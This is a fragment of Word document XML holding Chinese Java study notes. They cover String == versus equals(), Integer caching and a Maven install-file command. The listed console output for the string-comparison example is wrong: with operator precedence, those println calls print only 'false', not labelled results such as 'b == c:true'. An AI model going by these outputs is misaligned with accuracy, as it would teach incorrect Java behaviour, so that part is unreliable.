        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A44E26C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    String a = "Hello World";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAF2A44" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    String b = new String("Hello World");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF55529" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    String c = b; //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用传递</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D0D372" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    System.out.println("a == b:" + a == b);             //false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614C962D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    System.out.println("b == c:" + b == c);             //true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522A2D6A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    System.out.println("a == c:" + a == c);             //false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371D1905" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    System.out.println("a.equals(b):" + a.equals(b));   //true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7255A2AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    System.out.println("b.equals(c):" + b.equals(c));   //true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4E4965" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    System.out.println("a.equals(c):" + a.equals(c));   //true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0862886D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4718842E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最终的打印会是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1293B699" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    a == b:false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D0D5E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    b == c:true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AB2CAE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    a == c:false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDDCB4F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.equals(b):true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCD3CBC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    b.equals(c):true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759FEA7C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    a.equals(c):true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F3905C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F5CFE6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> String b </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的方式已经开辟了新的堆内存，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> String a = "Hello World" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是存放在常量池里的，两者在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存里存在放的位置是不同的，所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> a == b </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法当两者存放的内存地址不同时，会比较两者的值，两者的值都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Hello World" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> a.equals(b) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0535600F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB2C715" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外请思考一下下方代码的运行结果为什么是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448C7434" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B52C73B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public class Java_epuals {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B20232" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750AF0E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        Integer i2 = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC7FB33" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        Integer i3 = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FC98FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println(i2 == i3); // true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7685E3FE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09888F92" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        Integer i4 = 128;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F89719" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        Integer i5 = 128;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C989BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println(i4 == i5); // false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B570C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B42B5B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F00A38" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C4B6BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> i2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> i3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的比较，因为变量的定义方法是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> i2(i3) = 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它们的变量会置于常量区，两个变量的内存地址相同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A3A444" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10E1873E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>此时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370E1464" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32310304" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么为什么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> i4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> i5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> false </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>呢？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4D7D42" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40CB076C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> integer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>范围取值要在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-128</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">+127 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（为什么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象范围（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-128-127</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）之间），而我们赋的值是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 128 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，此时变量并不在常量区定义。所以两个变量的内存地址不同，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">== </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E887C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EAE03C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="743" w:name="_Toc159780171"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打包</w:t>
      </w:r>
      <w:bookmarkEnd w:id="743"/>
    </w:p>
    <w:p w14:paraId="34D400B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="744" w:name="_Toc159780172"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Maven</w:t>
      </w:r>
      <w:bookmarkEnd w:id="744"/>
    </w:p>
    <w:p w14:paraId="442C96B8" w14:textId="2412105D" w:rsidR="004C452C" w:rsidRDefault="00183B13" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包到</w:t>
      </w:r>
      <w:r>
        <w:t>.m2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仓库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640A949A" w14:textId="6658124E" w:rsidR="00183B13" w:rsidRDefault="00D22D0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178494D4" w14:textId="47EF4EF4" w:rsidR="00183B13" w:rsidRDefault="00391189" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D22D0A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mvn install:install-file -Dfile=&lt;path-to-your-jar-file&gt; -DgroupId=&lt;group-id&gt; -DartifactId=&lt;artifact-id&gt; -Dversion=&lt;version&gt; -Dpackaging=jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B4BE75" w14:textId="68AF9912" w:rsidR="00391189" w:rsidRDefault="00D22D0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3335BC" w14:textId="3F307DBC" w:rsidR="00D22D0A" w:rsidRDefault="00D22D0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D22D0A">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mvn install:install-file -Dfile=/path/to/my-library-1.0.0.jar -DgroupId=com.example -DartifactId=my-library -Dversion=1.0.0 -Dpackaging=jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4F543F" w14:textId="1D5FB494" w:rsidR="00D22D0A" w:rsidRDefault="00D22D0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BBD6FF5" w14:textId="77777777" w:rsidR="00D22D0A" w:rsidRDefault="00D22D0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;path-to-your-jar-file&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：您的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7CF394" w14:textId="77777777" w:rsidR="00D22D0A" w:rsidRDefault="00D22D0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;group-id&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Maven</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>groupId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，通常是包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的项目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包名称。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D994C0F" w14:textId="77777777" w:rsidR="00D22D0A" w:rsidRDefault="00D22D0A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;artifact-id&gt;</w:t>
      </w:r>
      <w:r>
